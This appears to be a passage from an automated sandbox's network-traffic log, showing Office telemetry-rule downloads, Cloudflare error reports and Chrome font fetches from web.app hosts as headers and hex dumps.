                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                41192.168.2.64977213.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:57 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                                                                x-ms-request-id: d112c6a6-a01e-000d-2160-17d1ea000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144157Z-1657d5bbd482lxwq1dp2t1zwkc00000001y0000000004dah
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                42192.168.2.64977113.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:57 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 404
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                                                x-ms-request-id: f57b7c9f-801e-00a0-4a13-172196000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144157Z-1657d5bbd48xdq5dkwwugdpzr000000002gg000000002x3q
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                43192.168.2.64976913.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:57 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                                                x-ms-request-id: 20b36261-201e-006e-7102-17bbe3000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144157Z-1657d5bbd48cpbzgkvtewk0wu0000000023000000000n5m9
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                44192.168.2.64977013.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:57 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                                                x-ms-request-id: 09392ef7-101e-0046-3f05-1791b0000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144157Z-1657d5bbd48p2j6x2quer0q02800000002b00000000080sy
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                45192.168.2.64977535.190.80.14433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC534OUTOPTIONS /report/v4?s=0uEApuaEmtzuivqdO%2Bc%2BVva08Cg5A3g2NMXVtweKr2PFaX9%2Fgv8iGNDVyJjaQWA87iiH6r0%2BA4L49sPUmI%2FfMZAFGqKlaGppzyMi1KZ3NIOp6k7ZwUBYeytXJDj9OA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                Origin: https://starpng.com
                                                                                                                                                                                                                                                                                Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                access-control-max-age: 86400
                                                                                                                                                                                                                                                                                access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                                                access-control-allow-headers: content-length, content-type
                                                                                                                                                                                                                                                                                date: Sun, 06 Oct 2024 14:41:57 GMT
                                                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                46192.168.2.649778199.36.158.1004433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC617OUTGET /50c990406fd29b27791056f5bd492ff44cfd362e.ttf HTTP/1.1
                                                                                                                                                                                                                                                                                Host: ruletridominium.web.app
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://chattts-49f1.beszyrecala.workers.dev
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                Referer: https://kengegame.web.app/
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC591INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 30352
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Content-Type: font/ttf
                                                                                                                                                                                                                                                                                Etag: "b26af31d3284c81df8ee21d52543a0e7be2df9d6c0294c445bb5f2dcf9b00d5b"
                                                                                                                                                                                                                                                                                Last-Modified: Sat, 19 Feb 2022 17:52:41 GMT
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:58 GMT
                                                                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740027-EWR
                                                                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                X-Timer: S1728225719.580206,VS0,VE1
                                                                                                                                                                                                                                                                                Vary: x-fh-requested-host, accept-encoding
                                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC1378INData Raw: 00 01 00 00 00 0f 00 80 00 03 00 70 44 53 49 47 00 00 00 01 00 00 76 88 00 00 00 08 46 46 54 4d 60 05 61 77 00 00 76 4c 00 00 00 1c 47 44 45 46 00 29 01 01 00 00 76 68 00 00 00 1e 4f 53 2f 32 17 d0 2c 21 00 00 01 78 00 00 00 60 63 6d 61 70 e5 5b a3 c5 00 00 05 c8 00 00 02 5a 67 61 73 70 00 00 00 10 00 00 76 44 00 00 00 08 67 6c 79 66 09 33 46 59 00 00 0a 28 00 00 60 c8 68 65 61 64 f9 3b 50 43 00 00 00 fc 00 00 00 36 68 68 65 61 07 48 03 d8 00 00 01 34 00 00 00 24 68 6d 74 78 f8 23 1f 48 00 00 01 d8 00 00 03 f0 6c 6f 63 61 74 17 5c 16 00 00 08 2c 00 00 01 fa 6d 61 78 70 01 45 00 5d 00 00 01 58 00 00 00 20 6e 61 6d 65 77 d0 48 68 00 00 6a f0 00 00 08 fa 70 6f 73 74 25 2e 2a 5b 00 00 73 ec 00 00 02 56 70 72 65 70 68 06 8c 85 00 00 08 24 00 00 00 07 00 01 00
                                                                                                                                                                                                                                                                                Data Ascii: pDSIGvFFTM`awvLGDEF)vhOS/2,!x`cmap[ZgaspvDglyf3FY(`head;PC6hheaH4$hmtx#Hlocat\,maxpE]X namewHhjpost%.*[sVpreph$


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                47192.168.2.64977635.190.80.14433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC480OUTPOST /report/v4?s=0uEApuaEmtzuivqdO%2Bc%2BVva08Cg5A3g2NMXVtweKr2PFaX9%2Fgv8iGNDVyJjaQWA87iiH6r0%2BA4L49sPUmI%2FfMZAFGqKlaGppzyMi1KZ3NIOp6k7ZwUBYeytXJDj9OA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                Content-Length: 452
                                                                                                                                                                                                                                                                                Content-Type: application/reports+json
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC452OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 38 39 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 31 2e 35 35 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e 65 64 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 74 61 72 70 6e 67 2e 63 6f 6d 2f 70 75 62 6c 69 63
                                                                                                                                                                                                                                                                                Data Ascii: [{"age":1,"body":{"elapsed_time":2892,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.1.55","status_code":200,"type":"abandoned"},"type":"network-error","url":"https://starpng.com/public
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                date: Sun, 06 Oct 2024 14:41:58 GMT
                                                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                48192.168.2.649779199.36.158.1004433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC617OUTGET /0660c9ab1b018a073e06d7a13b0b3959940effba.ttf HTTP/1.1
                                                                                                                                                                                                                                                                                Host: ruletridominium.web.app
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://chattts-49f1.beszyrecala.workers.dev
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                Referer: https://kengegame.web.app/
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC591INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 95760
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Content-Type: font/ttf
                                                                                                                                                                                                                                                                                Etag: "2a56fbc7fd6a4fdadc36f6e52d719d1a8faa22cf2f24fa0d58749b00cf8f07bc"
                                                                                                                                                                                                                                                                                Last-Modified: Sat, 19 Feb 2022 17:52:41 GMT
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:58 GMT
                                                                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740052-EWR
                                                                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                X-Timer: S1728225719.629787,VS0,VE1
                                                                                                                                                                                                                                                                                Vary: x-fh-requested-host, accept-encoding
                                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC1378INData Raw: 00 01 00 00 00 12 01 00 00 04 00 20 44 53 49 47 00 00 00 01 00 01 76 08 00 00 00 08 47 44 45 46 33 02 33 ed 00 00 01 2c 00 00 00 e6 47 50 4f 53 12 64 05 f7 00 00 02 14 00 00 3c a8 47 53 55 42 57 27 2a 5f 00 00 3e bc 00 00 10 e2 4f 53 2f 32 69 e3 a2 4d 00 00 4f a0 00 00 00 60 63 6d 61 70 10 35 fc ba 00 00 50 00 00 00 0a 1e 63 76 74 20 3a 1a 04 b9 00 01 67 b4 00 00 00 98 66 70 67 6d 76 64 7f 7a 00 01 68 4c 00 00 0d 16 67 61 73 70 00 00 00 10 00 01 67 ac 00 00 00 08 67 6c 79 66 3a 56 fa c7 00 00 5a 20 00 00 db da 68 65 61 64 0b 81 e2 69 00 01 35 fc 00 00 00 36 68 68 65 61 07 aa 06 34 00 01 36 34 00 00 00 24 68 6d 74 78 17 66 58 88 00 01 36 58 00 00 0c 0e 6c 6f 63 61 f8 16 30 1b 00 01 42 68 00 00 06 18 6d 61 78 70 04 5c 0d ed 00 01 48 80 00 00 00 20 6e 61 6d
                                                                                                                                                                                                                                                                                Data Ascii: DSIGvGDEF33,GPOSd<GSUBW'*_>OS/2iMO`cmap5Pcvt :gfpgmvdzhLgaspgglyf:VZ headi56hhea464$hmtxfX6Xloca0Bhmaxp\H nam
                                                                                                                                                                                                                                                                                2024-10-06 14:41:58 UTC1378INData Raw: 00 00 ff f0 00 00 ff f6 00 00 00 39 ff e1 00 00 00 00 ff f5 ff f6 00 00 00 00 00 00 00 00 00 00 00 00 ff f6 00 00 ff f9 00 07 00 05 00 00 00 03 00 00 00 00 ff f6 00 00 00 00 00 00 00 00 00 00 00 00 ff e6 00 0a ff f3 00 14 00 0a 00 00 00 00 00 00 00 00 ff f3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff e2 ff f1 00 00 00 00 00 00 00 00 00 00 00 00 ff d5 00 00 ff f0 ff f6 ff f6 00 00 ff e6 00 00 ff d5 ff e0 ff d3 00 00 ff ce 00 00 ff cb ff d5 ff c1 00 00 00 00 00 00 00 00 ff e2 00 0a ff d5 00 00 ff b9 00 00 00 43 ff cb 00 00 ff c1 ff cb ff cb 00 00 00 00 00 00 00 00 00 07 00 07 ff fb ff a9 00 08 ff ed ff f6 00 03 00 05 00 0d 00 03 00 03 00 00 00 00 00 00 00 0f ff f6 00 05 ff ce 00 00 ff d5 00 0f 00 3c ff ce 00 21 ff d1 ff e7 ff d9 00 00 ff f5 00 00 00 00 00
                                                                                                                                                                                                                                                                                Data Ascii: 9C<!
